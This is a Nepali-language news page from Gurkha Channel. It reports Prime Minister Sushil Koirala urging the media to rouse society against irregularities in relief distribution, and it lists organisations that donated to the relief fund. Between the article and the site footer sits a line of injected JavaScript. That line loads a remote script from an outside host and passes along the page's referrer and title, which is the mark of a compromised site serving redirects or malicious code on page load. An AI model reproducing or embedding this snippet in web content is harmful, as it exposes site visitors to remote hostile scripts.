समाजलाई झकझकाउन सञ्चारमाध्यमलाई आग्रह

Naresh Ale Avatar

प्रधानमन्त्री सुशील कोईरालाले राहत बितरणमा अनियमितिता हुन नदिनका लागी समाजलाई झकझकाउन सञ्चारमाध्यमलाई आग्रह गर्नुभएको छ। मंगलबार प्रधानमन्त्री निबास बालुवाटारमा बिभिन्न संघ संस्थाको राहत रकम बुझ्दै कोईरालाले राहतका बिषयमा बिभिन्न

टिका टिप्पणी भईरहेको भन्दै अनियमितिता हुन नदिनका लागी समाजलाई झकझकाउन आग्रह गर्नुभएको हो। उहाले राहत बितरण कार्यलाई अनियमतिता हुन नदिने बताउनुभयो। बिभिन्न संघ संस्थाबाट प्राप्त सहयोगको दुरुपयोग भएको भन्ने आरोप निराधार भएको भन्दै प्रधानमन्त्री दैवी उद्धार कोषबाट प्रभावित जनतालाइृ राहत बितरण गर्ने कार्य भईरहेको उल्लेख गर्नुभयो। मंगलबार नेपाल बिद्युत प्राधिकरण, डाबर नेपाल, एन सेल, प्रेस युनियन लगाएतले प्रधानमन्त्री दैवी उद्धार राहत कोषमा रकम प्रदान गरेका थिए।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

admin Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories